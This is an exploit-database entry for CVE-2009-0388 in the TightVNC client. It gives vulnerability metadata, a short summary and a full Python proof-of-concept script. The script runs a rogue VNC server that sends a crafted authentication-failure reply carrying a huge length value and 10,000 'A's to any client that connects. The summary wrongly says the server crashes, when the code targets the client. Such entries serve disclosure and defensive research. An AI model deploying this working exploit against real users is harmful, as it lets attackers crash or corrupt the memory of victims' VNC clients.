header-logo
Suggest Exploit
vendor:
TightVNC
by:
Andres Lopez Luksenberg
7.5
CVSS
HIGH
Authentication Failure
287
CWE
Product Name: TightVNC
Affected Version From: 1.3.2009
Affected Version To: 1.3.10
Patch Exists: YES
Related CWE: CVE-2009-0388
CPE: a:tightvnc:tightvnc:1.3.9
Metasploit: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Authentication Failure scenario in TightVNC Exploit

This exploit is a modified version of Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. It creates a socket connection and sends a RFB 003.008 message to the client. It then sends a series of messages to the client, including a string of 10000 'A's, which causes the server to crash. This exploit is related to BID 33569 and CVE-2009-0388.

Mitigation:

The vulnerability can be mitigated by upgrading to the latest version of TightVNC.
Source

Exploit-DB raw data:

#!/usr/bin/env python

#digital.desi@in.com

# Modified  Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. BID 33569 CVE-2009-0388

import socket

serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)

while True:
		clientsocket, clientaddres = serversocket.accept()
		
		data = 'RFB 003.008\n'
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)
		print data_cli

		data = '\x02\x02\x10'
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)

		data = '\x00'*4
		clientsocket.sendall(data)

		data = ('\x00'*3)+'\x01'
		clientsocket.sendall(data)

		data = ('\x00'*3)+'\x02STDVVNCAUTH_'
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)

		data = ('\x01'*16)
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)
		
		data = '\x00\x00\x00\x01'
		clientsocket.sendall(data)

		data = '\xf0\xff\xff\xff'
		clientsocket.sendall(data)

		data = 'A'*10000
		clientsocket.sendall(data)

clientsocket.close()
serversocket.close()

# milw0rm.com [2009-02-09]